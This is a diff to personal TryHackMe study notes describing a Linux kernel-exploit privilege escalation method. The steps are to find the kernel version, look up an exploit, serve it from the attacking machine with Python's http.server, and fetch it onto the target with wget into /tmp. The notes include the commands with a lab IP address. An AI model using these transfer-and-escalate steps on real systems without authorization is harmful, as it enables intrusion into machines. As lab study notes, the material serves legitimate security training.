clydebuilt1974/TryHackMe/Junior Penetration Tester/Privilege Escalation/Linux Privilege Escalation.md

 * Read all comments and instructions provided with the exploit code.
 * Transfer exploit code from the attacking machine to the target system using the `SimpleHTTPServer` Python module and `wget` respectively.

-## The steps of the Kernel exploit Methodology
+## Kernel exploit Methodology
-* Identify the kernel version.
+1. Identify the kernel version.
 ```
 uname -a
 ```
-* Find an exploit code for the kernel version of the target system.
+2. Find an exploit code for the kernel version of the target system.
   * Use [Exploit Database](https://www.exploit-db.com) to search for an existing exploit code.
-* Download the exploit to the attacking machine.
+3. Download the exploit to the attacking machine.
-* Serve the exploit code to the target using `SimpleHTTPServer` Python module.
+4. Serve the exploit code to the target using `SimpleHTTPServer` Python module.
 ```
 python3 -m http.server 9000
 ```
-* Use `wget` on target machine to copy the code across.
+5. Use `wget` on target machine to copy the code across.
 ```
 wget http://10.10.166.35:9000/37392.c -P /tmp/
 ```
   * `-P` option specifies that the file should be saved to the `/tmp/` directory on the target.
   * Specify the path as `/tmp/` where the file be downloaded to avoid the permission error while running `wget` because you are a low-level privilege user (karen).
-* Run the exploit file to perform privilege escalation.
+6. Run the exploit file to perform privilege escalation.
 > Some exploits may require further interaction once they are run.
 Read all comments and instructions provided with the exploit code.
   * Rename exploit file.
 ```